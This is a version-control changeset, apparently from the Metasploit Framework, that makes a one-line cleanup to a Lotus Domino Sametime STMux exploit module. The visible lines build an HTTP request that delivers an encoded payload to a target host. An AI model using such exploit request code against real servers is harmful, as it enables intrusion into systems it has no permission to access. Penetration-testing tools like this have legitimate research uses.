Changeset 6094
- Timestamp:
- 01/08/09 19:22:04 (6 months ago)
- Files:
-
- 1 modified
Legend:
- Unmodified
- Added
- Removed
-
framework3/trunk/modules/exploits/windows/lotus/domino_sametime_stmux.rb
r6080 r6094 115 115 req << "User-Agent: Sametime Community Agent\r\n" 116 116 req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" 117 req << "Content-Length: #{payload.encoded.length .to_s}\r\n"117 req << "Content-Length: #{payload.encoded.length}\r\n" 118 118 req << "Connection: Close\r\n" 119 119 req << "Cache-Control: no-cache\r\n\r\n"
